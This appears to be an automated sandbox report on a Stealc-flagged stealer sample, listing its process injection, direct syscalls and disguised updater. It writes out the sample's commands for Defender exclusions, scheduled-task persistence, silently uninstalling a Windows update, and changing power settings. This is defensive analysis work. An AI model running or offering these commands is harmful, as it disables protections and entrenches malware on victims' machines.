                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Allocates memory in foreign processes
                        Source: C:\Users\user\Desktop\S0FTWARE.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A00000 protect: page execute and read and writeJump to behavior
                        Contains functionality to inject code into remote processes
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A112EC _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,3_2_02A112EC
                        Found direct / indirect Syscall (likely to bypass EDR)
                        Source: C:\ProgramData\AAFIJKKEHJ.exeNtProtectVirtualMemory: Direct from: 0x7FF6AE09759E
                        Source: C:\ProgramData\AAFIJKKEHJ.exeNtProtectVirtualMemory: Direct from: 0x7FF6AE0A7097
                        Source: C:\ProgramData\AAFIJKKEHJ.exeNtProtectVirtualMemory: Direct from: 0x7FF6AE0AF0E3
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76EC4F40A
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76F37C6D7
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76EC50EB5
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76EB7DA52
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76F057499
                        Source: C:\ProgramData\AAFIJKKEHJ.exeNtProtectVirtualMemory: Direct from: 0x7FF6ADFCE02B
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76F07879D
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76F062F18
                        Source: C:\ProgramData\AAFIJKKEHJ.exeNtProtectVirtualMemory: Direct from: 0x7FF6AE7EDA3F
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76EB68F1E
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76F38D15E
                        Source: C:\ProgramData\AAFIJKKEHJ.exeNtProtectVirtualMemory: Direct from: 0x7FF6ADFD656A
                        Source: C:\ProgramData\AAFIJKKEHJ.exeNtProtectVirtualMemory: Direct from: 0x7FF6AE7DC6D7
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76EB6E02B
                        Source: C:\ProgramData\AAFIJKKEHJ.exeNtProtectVirtualMemory: Direct from: 0x7FF6AE4BF4E3
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76F360DB4
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A00000 value starts with: 4D5AJump to behavior
                        Modifies the hosts file
                        Source: C:\ProgramData\AAFIJKKEHJ.exeFile written: C:\Windows\System32\drivers\etc\hosts
                        Searches for specific processes (likely to inject)
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A142EE __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_02A142EE
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A14452 CreateToolhelp32Snapshot,Process32First,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,3_2_02A14452
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A143C5 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_02A143C5
                        Writes to foreign memory regions
                        Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2865008Jump to behavior
                        Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A00000Jump to behavior
                        Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A01000Jump to behavior
                        Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A31000Jump to behavior
                        Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A3E000Jump to behavior
                        Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2C53000Jump to behavior
                        Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2C54000Jump to behavior
                        Source: C:\Users\user\Desktop\S0FTWARE.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\ProgramData\AAFIJKKEHJ.exe "C:\ProgramData\AAFIJKKEHJ.exe" Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\ProgramData\GHDAKKJJJK.exe "C:\ProgramData\GHDAKKJJJK.exe" Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GCGHJEBGHJKE" & exitJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\ProgramData\GHDAKKJJJK.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: C:\Users\user\AppData\Roaming\service.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C754760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,3_2_6C754760
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C631C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,3_2_6C631C30
                        Source: S0FTWARE.exe, 00000000.00000002.2229780239.000000000107A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: maMIPS JMP AddrMIPS with FPUMapViewOfFileMasaram_GondiMende_KikakuiMethodOptionsMikrosekundenMillisekundenModifyChannelModifyWebhookModule32NextWNetIsHostnameNotCongruent;NotHumpEqual;NotLessEqual;NotLessTilde;NtQueryObjectOMAP From SrcOld_HungarianOleInitializeOpenClipboardOpenThemeDataPKCS1WithSHA1PartyModeTempPdhCloseQueryProportional;Quechua (quz)RISC-V Low 12RISC-V Low12sRate limited.ReadDBPointerReadTimestampReadUndefinedRegDeleteKeyWRegEnumKeyExWRegEnumValueWRegOpenKeyExWRelative pathReservedNamesReset ContentRightCeiling;Romanian (ro)RoundImplies;RoundingMode(RtlGetVersionRtlInitStringRtlMoveMemorySHA256-RSAPSSSHA384-RSAPSSSHA512-RSAPSSSTREAM_CLOSEDSafeArrayCopySafeArrayLockSanskrit (sa)SetBrushOrgExSetScrollInfoSetWindowLongSetswana (tn)ShellExecuteWShell_TrayWndShortUpArrow;SquareSubset;StandAloneSigStartServiceWStringPatternStructEndBoolStructEndUintStructHeadIntStructHeadMapStructPtrHeadSwa hwaer swaSwa hw
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0118E cpuid 3_2_02A0118E
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,3_2_02A12A37
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,3_2_02A2CAE8
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_02A2B2D0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_02A2CA41
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,3_2_02A2C3C0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_02A2CB43
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_02A2C94C
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,3_2_02A2CEA3
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_02A2CE00
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_02A2CE67
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_02A2A644
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetLocaleInfoA,3_2_02A2FF24
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,3_2_02A26C63
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_02A2B5EE
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,3_2_02A2FDEF
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_02A28DF6
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: EnumSystemLocalesA,3_2_02A2CDD6
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_02A2CD14
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,3_2_02A28D1C
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\S0FTWARE.exeQueries volume information: C:\Users\user\Desktop\S0FTWARE.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\S0FTWARE.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\S0FTWARE.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A138A6 GetSystemTime,3_2_02A138A6
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A128AF GetProcessHeap,RtlAllocateHeap,GetUserNameA,3_2_02A128AF
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A1298A GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,3_2_02A1298A
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C658390 NSS_GetVersion,3_2_6C658390
                        Source: C:\Users\user\Desktop\S0FTWARE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Modifies power options to not sleep / hibernate
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                        Modifies the hosts file
                        Source: C:\ProgramData\AAFIJKKEHJ.exeFile written: C:\Windows\System32\drivers\etc\hosts
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Stealc
                        Source: Yara matchFile source: 3.2.BitLockerToGo.exe.2a00000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13780000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13556000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138bdec0.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13780000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13556000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13880000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.138c6000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138c6000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13780000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13780000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.138bdec0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138bdec0.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13880000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13880000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138c6000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2190577336.00000000137EE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
